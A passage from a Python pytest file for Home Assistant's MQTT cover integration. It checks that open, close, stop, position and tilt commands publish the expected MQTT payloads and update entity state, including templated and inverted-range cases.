    mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_optimistic_state_change_with_position(hass, mqtt_mock):
    """Test changing state optimistically."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "optimistic": True,
                "command_topic": "command-topic",
                "position_topic": "position-topic",
                "qos": 0,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert state.attributes.get(ATTR_ASSUMED_STATE)
    assert state.attributes.get(ATTR_CURRENT_POSITION) is None
    # With a position topic, the optimistic state also fixes the position
    # attribute (open -> 100, closed -> 0).
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    assert state.attributes.get(ATTR_CURRENT_POSITION) == 100
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    assert state.attributes.get(ATTR_CURRENT_POSITION) == 0
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    assert state.attributes.get(ATTR_CURRENT_POSITION) == 100
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    assert state.attributes.get(ATTR_CURRENT_POSITION) == 0
async def test_send_open_cover_command(hass, mqtt_mock):
    """Test the sending of open_cover."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 2,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    # The configured QoS (2) must be forwarded with the publish.
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 2, False)
    # With a state topic present the state stays unknown until feedback.
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
async def test_send_close_cover_command(hass, mqtt_mock):
    """Test the sending of close_cover."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 2,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 2, False)
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
# NOTE(review): double underscore in the name looks like a typo
# ("test_send_stop_cover_command"); renaming would change the test ID,
# so it is only flagged here.
async def test_send_stop__cover_command(hass, mqtt_mock):
    """Test the sending of stop_cover."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 2,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_STOP_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "STOP", 2, False)
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
async def test_current_cover_position(hass, mqtt_mock):
    """Test the current cover position."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "position_open": 100,
                "position_closed": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    state_attributes_dict = hass.states.get("cover.test").attributes
    assert ATTR_CURRENT_POSITION not in state_attributes_dict
    assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
    # Feature bit with value 4 must be absent: no set_position_topic is
    # configured (presumably SUPPORT_SET_POSITION — confirm against the enum).
    assert 4 & hass.states.get("cover.test").attributes["supported_features"] != 4
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 0
    async_fire_mqtt_message(hass, "get-position-topic", "50")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 50
    # A non-numeric payload must leave the last known position untouched.
    async_fire_mqtt_message(hass, "get-position-topic", "non-numeric")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 50
    # An out-of-range payload is clamped to 100.
    async_fire_mqtt_message(hass, "get-position-topic", "101")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 100
async def test_current_cover_position_inverted(hass, mqtt_mock):
    """Test the current cover position."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                # Inverted range: device 0 means fully open, 100 fully closed.
                "position_open": 0,
                "position_closed": 100,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    state_attributes_dict = hass.states.get("cover.test").attributes
    assert ATTR_CURRENT_POSITION not in state_attributes_dict
    assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
    assert 4 & hass.states.get("cover.test").attributes["supported_features"] != 4
    async_fire_mqtt_message(hass, "get-position-topic", "100")
    current_percentage_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_percentage_cover_position == 0
    assert hass.states.get("cover.test").state == STATE_CLOSED
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    current_percentage_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_percentage_cover_position == 100
    assert hass.states.get("cover.test").state == STATE_OPEN
    async_fire_mqtt_message(hass, "get-position-topic", "50")
    current_percentage_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_percentage_cover_position == 50
    assert hass.states.get("cover.test").state == STATE_OPEN
    async_fire_mqtt_message(hass, "get-position-topic", "non-numeric")
    current_percentage_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_percentage_cover_position == 50
    assert hass.states.get("cover.test").state == STATE_OPEN
    # 101 is clamped to the device's closed end, i.e. percentage 0.
    async_fire_mqtt_message(hass, "get-position-topic", "101")
    current_percentage_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_percentage_cover_position == 0
    assert hass.states.get("cover.test").state == STATE_CLOSED
async def test_optimistic_position(hass, mqtt_mock):
    """Test optimistic position is not supported."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
            }
        },
    )
    await hass.async_block_till_done()
    # set_position_topic without position_topic is invalid config, so the
    # entity must not be created at all.
    state = hass.states.get("cover.test")
    assert state is None
async def test_position_update(hass, mqtt_mock):
    """Test cover position update from received MQTT message."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_open": 100,
                "position_closed": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    state_attributes_dict = hass.states.get("cover.test").attributes
    assert ATTR_CURRENT_POSITION not in state_attributes_dict
    assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
    # With set_position_topic configured, feature bit 4 must now be present.
    assert 4 & hass.states.get("cover.test").attributes["supported_features"] == 4
    async_fire_mqtt_message(hass, "get-position-topic", "22")
    state_attributes_dict = hass.states.get("cover.test").attributes
    assert ATTR_CURRENT_POSITION in state_attributes_dict
    assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 22
@pytest.mark.parametrize(
    "pos_template,pos_call,pos_message",
    # Template output is what gets published: 43-1 -> "42"; constant 100-62 -> "38".
    [("{{position-1}}", 43, "42"), ("{{100-62}}", 100, "38")],
)
async def test_set_position_templated(
    hass, mqtt_mock, pos_template, pos_call, pos_message
):
    """Test setting cover position via template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "position_open": 100,
                "position_closed": 0,
                "set_position_topic": "set-position-topic",
                "set_position_template": pos_template,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: pos_call},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "set-position-topic", pos_message, 0, False
    )
async def test_set_position_templated_and_attributes(hass, mqtt_mock):
    """Test setting cover position via template and using entities attributes."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "position_open": 100,
                "position_closed": 0,
                "set_position_topic": "set-position-topic",
                "set_position_template": '\
                {% if position > 99 %}\
                  {% if state_attr(entity_id, "current_position") == None %}\
                    {{ 5 }}\
                  {% else %}\
                    {{ 23 }}\
                  {% endif %}\
                {% else %}\
                  {{ 42 }}\
                {% endif %}',
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 100},
        blocking=True,
    )
    # position=100 with no current_position attribute yet -> the "5" branch.
    mqtt_mock.async_publish.assert_called_once_with("set-position-topic", "5", 0, False)
async def test_set_tilt_templated(hass, mqtt_mock):
    """Test that tilt_command_template renders the published tilt payload."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "position_topic": "get-position-topic",
            "command_topic": "command-topic",
            "tilt_command_topic": "tilt-command-topic",
            "position_open": 100,
            "position_closed": 0,
            "set_position_topic": "set-position-topic",
            "set_position_template": "{{position-1}}",
            "tilt_command_template": "{{tilt_position+1}}",
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Requested tilt 41 is incremented by the template to 42 before publish.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 41},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "42", 0, False
    )
async def test_set_tilt_templated_and_attributes(hass, mqtt_mock):
    """Test setting cover tilt position via template and using entities attributes."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "tilt_command_topic": "tilt-command-topic",
                "position_open": 100,
                "position_closed": 0,
                "set_position_topic": "set-position-topic",
                "set_position_template": "{{position-1}}",
                # Template reads the entity's friendly_name attribute rather
                # than the requested tilt value.
                "tilt_command_template": '\
                {% if state_attr(entity_id, "friendly_name") != "test" %}\
                  {{ 5 }}\
                {% else %}\
                  {{ 23 }}\
                {% endif %}',
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    # friendly_name is "test", so the template always renders 23 here; the
    # requested tilt position (99) is deliberately ignored by the template.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 99},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "23", 0, False
    )
async def test_set_position_untemplated(hass, mqtt_mock):
    """Test setting cover position without a template (raw value published)."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "position_topic": "state-topic",
            "command_topic": "command-topic",
            "set_position_topic": "position-topic",
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Without set_position_template the requested value is published verbatim.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 62},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with("position-topic", "62", 0, False)
async def test_set_position_untemplated_custom_percentage_range(hass, mqtt_mock):
    """Test setting cover position without a template with an inverted range."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "position_topic": "state-topic",
            "command_topic": "command-topic",
            "set_position_topic": "position-topic",
            "position_open": 0,
            "position_closed": 100,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # With open=0/closed=100 the percentage is inverted: 38% -> payload "62".
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 38},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with("position-topic", "62", 0, False)
async def test_no_command_topic(hass, mqtt_mock):
    """Test supported features when no command topic is configured."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command",
            "tilt_status_topic": "tilt-status",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Without a command topic only the tilt-related features remain supported.
    assert hass.states.get("cover.test").attributes["supported_features"] == 240
async def test_no_payload_close(hass, mqtt_mock):
    """Test supported features when the close payload is disabled."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": None,
            "payload_stop": "STOP",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Only open and stop should be advertised when close is disabled.
    assert hass.states.get("cover.test").attributes["supported_features"] == 9
async def test_no_payload_open(hass, mqtt_mock):
    """Test supported features when the open payload is disabled."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": None,
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Only close and stop should be advertised when open is disabled.
    assert hass.states.get("cover.test").attributes["supported_features"] == 10
async def test_no_payload_stop(hass, mqtt_mock):
    """Test supported features when the stop payload is disabled."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": None,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Only open and close should be advertised when stop is disabled.
    assert hass.states.get("cover.test").attributes["supported_features"] == 3
async def test_with_command_topic_and_tilt(hass, mqtt_mock):
    """Test supported features with both command topic and tilt config."""
    config = {
        cover.DOMAIN: {
            "command_topic": "test",
            "platform": "mqtt",
            "name": "test",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command",
            "tilt_status_topic": "tilt-status",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Cover movement plus all tilt features should be advertised together.
    assert hass.states.get("cover.test").attributes["supported_features"] == 251
async def test_tilt_defaults(hass, mqtt_mock):
    """Test the default tilt attributes before any status update arrives."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command",
            "tilt_status_topic": "tilt-status",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    attributes = hass.states.get("cover.test").attributes
    # The tilt attribute is exposed but unknown until a status message arrives.
    assert ATTR_CURRENT_TILT_POSITION in attributes
    assert attributes[ATTR_CURRENT_TILT_POSITION] == STATE_UNKNOWN
async def test_tilt_via_invocation_defaults(hass, mqtt_mock):
    """Test tilt defaults on close/open."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "tilt_command_topic": "tilt-command-topic",
                "tilt_status_topic": "tilt-status-topic",
            }
        },
    )
    await hass.async_block_till_done()
    # Open tilt: with no tilt_opened_value configured, "100" is published.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_OPEN_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "100", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # Close tilt: with no tilt_closed_value configured, "0" is published.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_CLOSE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
    mqtt_mock.async_publish.reset_mock()
    # Close tilt status would be received from device when non-optimistic
    async_fire_mqtt_message(hass, "tilt-status-topic", "0")
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 0
    # Toggle from the closed tilt state should publish the open value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_TOGGLE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "100", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # Open tilt status would be received from device when non-optimistic
    async_fire_mqtt_message(hass, "tilt-status-topic", "100")
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 100
    # Toggle from the open tilt state should publish the closed value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_TOGGLE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
async def test_tilt_given_value(hass, mqtt_mock):
    """Test tilting to a given value."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "tilt_command_topic": "tilt-command-topic",
                "tilt_status_topic": "tilt-status-topic",
                # Custom opened/closed values replace the 100/0 defaults.
                "tilt_opened_value": 80,
                "tilt_closed_value": 25,
            }
        },
    )
    await hass.async_block_till_done()
    # Open tilt publishes the configured tilt_opened_value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_OPEN_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "80", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # Close tilt publishes the configured tilt_closed_value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_CLOSE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # Close tilt status would be received from device when non-optimistic
    async_fire_mqtt_message(hass, "tilt-status-topic", "25")
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 25
    # Toggle from the closed tilt state publishes the opened value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_TOGGLE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "80", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # Open tilt status would be received from device when non-optimistic
    async_fire_mqtt_message(hass, "tilt-status-topic", "80")
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 80
    # Toggle from the open tilt state publishes the closed value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_TOGGLE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
async def test_tilt_given_value_optimistic(hass, mqtt_mock):
    """Test tilting to a given value in optimistic mode."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "tilt_command_topic": "tilt-command-topic",
                "tilt_status_topic": "tilt-status-topic",
                "tilt_opened_value": 80,
                "tilt_closed_value": 25,
                # Optimistic: state updates immediately, without a status message.
                "tilt_optimistic": True,
            }
        },
    )
    await hass.async_block_till_done()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_OPEN_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    # State reflects the opened value right away (no status message fired).
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 80
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "80", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    # An explicit tilt position is both published and applied optimistically.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
        blocking=True,
    )
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 50
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "50", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_CLOSE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    # Closing applies the configured closed value optimistically.
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 25
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
async def test_tilt_given_value_altered_range(hass, mqtt_mock):
    """Test tilting to a given value with an altered tilt range."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "tilt_command_topic": "tilt-command-topic",
                "tilt_status_topic": "tilt-status-topic",
                # Device range is 0..50; 25 is the device value for fully open.
                "tilt_opened_value": 25,
                "tilt_closed_value": 0,
                "tilt_min": 0,
                "tilt_max": 50,
                "tilt_optimistic": True,
            }
        },
    )
    await hass.async_block_till_done()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_OPEN_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    # Device value 25 in range 0..50 maps to 50% in HA's 0..100 scale.
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 50
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
    mqtt_mock.async_publish.reset_mock()
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_CLOSE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 0
    mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
    mqtt_mock.async_publish.reset_mock()
    # Toggle from closed publishes the (device-scale) opened value again.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_TOGGLE_COVER_TILT,
        {ATTR_ENTITY_ID: "cover.test"},
        blocking=True,
    )
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 50
    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
async def test_tilt_via_topic(hass, mqtt_mock):
    """Test tilt by updating status via MQTT."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # With the default 0..100 range the payload maps 1:1 to the attribute.
    for payload, expected in (("0", 0), ("50", 50)):
        async_fire_mqtt_message(hass, "tilt-status-topic", payload)
        tilt_position = hass.states.get("cover.test").attributes[
            ATTR_CURRENT_TILT_POSITION
        ]
        assert tilt_position == expected
async def test_tilt_via_topic_template(hass, mqtt_mock):
    """Test tilt by updating status via MQTT and template."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_status_template": "{{ (value | multiply(0.01)) | int }}",
            "tilt_opened_value": 400,
            "tilt_closed_value": 125,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # The status template divides the raw payload by 100 and truncates.
    for payload, expected in (("99", 0), ("5000", 50)):
        async_fire_mqtt_message(hass, "tilt-status-topic", payload)
        tilt_position = hass.states.get("cover.test").attributes[
            ATTR_CURRENT_TILT_POSITION
        ]
        assert tilt_position == expected
async def test_tilt_via_topic_template_json_value(hass, mqtt_mock, caplog):
    """Test tilt by updating status via MQTT and template with JSON value."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "tilt_command_topic": "tilt-command-topic",
                "tilt_status_topic": "tilt-status-topic",
                # The template extracts a single field from the JSON payload.
                "tilt_status_template": "{{ value_json.Var1 }}",
